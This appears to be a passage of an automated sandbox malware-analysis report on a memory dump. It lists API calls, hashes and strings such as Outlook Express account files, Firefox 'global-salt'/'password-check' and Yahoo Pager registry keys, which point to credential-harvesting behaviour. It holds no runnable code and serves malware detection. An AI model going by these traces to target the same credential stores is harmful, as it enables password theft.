                                      • Instruction ID: d39aacb0d07447bcfd979039f79cad875a94fb0475638bd6baea4f5a046d65b4
                                      • Opcode Fuzzy Hash: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                      • Instruction Fuzzy Hash: 6B2192B391411DAAEF11AF61DD40EEF3BACEF15354F004023F956E6211E6B8D981CBA5
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpystrlen$memsetsprintf
                                      • String ID: %s (%s)
                                      • API String ID: 3756086014-1363028141
                                      • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                      • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscat$memsetsprintf
                                      • String ID: %2.2X
                                      • API String ID: 125969286-791839006
                                      • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                      • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                      APIs
                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                      • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                        • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                      • String ID: ACD
                                      • API String ID: 1886237854-620537770
                                      • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                      • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                      APIs
                                      • memset.MSVCRT ref: 004091EC
                                      • sprintf.MSVCRT ref: 00409201
                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                      • String ID: caption$dialog_%d
                                      • API String ID: 2923679083-4161923789
                                      • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                      • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                      APIs
                                      Strings
                                      • no such savepoint: %s, xrefs: 00426A02
                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                      • abort due to ROLLBACK, xrefs: 00428781
                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                      • unknown error, xrefs: 004277B2
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                      • API String ID: 3510742995-3035234601
                                      • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                      • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                      • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                      • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                      • API String ID: 2221118986-3608744896
                                      • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                      • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                      • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                      • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                      APIs
                                      • memcpy.MSVCRT ref: 00442A5E
                                        • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcmpmemcpy
                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                      • API String ID: 1784268899-4153596280
                                      • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                      • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                      • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                      • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                      • memset.MSVCRT ref: 00410246
                                      • memset.MSVCRT ref: 00410258
                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                      • memset.MSVCRT ref: 0041033F
                                      • _mbscpy.MSVCRT ref: 00410364
                                      • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                      • String ID:
                                      • API String ID: 3974772901-0
                                      • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                      • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                      APIs
                                      • wcslen.MSVCRT ref: 0044406C
                                      • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                      • strlen.MSVCRT ref: 004440D1
                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                      • memcpy.MSVCRT ref: 004440EB
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                      • String ID:
                                      • API String ID: 577244452-0
                                      • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                      • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                      APIs
                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                      • _strcmpi.MSVCRT ref: 00404518
                                      • _strcmpi.MSVCRT ref: 00404536
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _strcmpi$memcpystrlen
                                      • String ID: imap$pop3$smtp
                                      • API String ID: 2025310588-821077329
                                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                      APIs
                                      • memset.MSVCRT ref: 0040C02D
                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                        • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                        • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                        • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                      • API String ID: 2726666094-3614832568
                                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                      APIs
                                      • memset.MSVCRT ref: 00403A88
                                      • memset.MSVCRT ref: 00403AA1
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,?,?,?), ref: 00403AB8
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                      • strlen.MSVCRT ref: 00403AE9
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                      • String ID:
                                      • API String ID: 1786725549-0
                                      • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                      • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                      • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                      • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                      APIs
                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                      • String ID:
                                      • API String ID: 2014771361-0
                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                      APIs
                                      • memcmp.MSVCRT ref: 00406151
                                        • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                        • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                        • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                      • memcmp.MSVCRT ref: 0040617C
                                      • memcmp.MSVCRT ref: 004061A4
                                      • memcpy.MSVCRT ref: 004061C1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcmp$memcpy
                                      • String ID: global-salt$password-check
                                      • API String ID: 231171946-3927197501
                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                      • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                      • EndPaint.USER32(?,?), ref: 004016F3
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                      • String ID:
                                      • API String ID: 19018683-0
                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                      APIs
                                      • memset.MSVCRT ref: 0040644F
                                      • memcpy.MSVCRT ref: 00406462
                                      • memcpy.MSVCRT ref: 00406475
                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                        • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                        • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                      • memcpy.MSVCRT ref: 004064B9
                                      • memcpy.MSVCRT ref: 004064CC
                                      • memcpy.MSVCRT ref: 004064F9
                                      • memcpy.MSVCRT ref: 0040650E
                                        • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID:
                                      • API String ID: 438689982-0
                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                      APIs
                                      • memset.MSVCRT ref: 0044495F
                                      • memset.MSVCRT ref: 00444978
                                      • memset.MSVCRT ref: 0044498C
                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                      • strlen.MSVCRT ref: 004449A8
                                      • memcpy.MSVCRT ref: 004449CD
                                      • memcpy.MSVCRT ref: 004449E3
                                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                      • memcpy.MSVCRT ref: 00444A23
                                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset$strlen
                                      • String ID:
                                      • API String ID: 2142929671-0
                                      • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                      • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                      • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                      • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                      APIs
                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                      • memset.MSVCRT ref: 0040330B
                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                      • strchr.MSVCRT ref: 0040335A
                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                      • strlen.MSVCRT ref: 0040339C
                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                      • String ID: Personalities
                                      • API String ID: 2103853322-4287407858
                                      • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                      • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                      APIs
                                      • memset.MSVCRT ref: 00444573
                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValuememset
                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                      • API String ID: 1830152886-1703613266
                                      • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                      • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                      APIs
                                      Strings
                                      • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                      • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                      • API String ID: 3510742995-272990098
                                      • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                      • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                      • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                      • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: H
                                      • API String ID: 2221118986-2852464175
                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
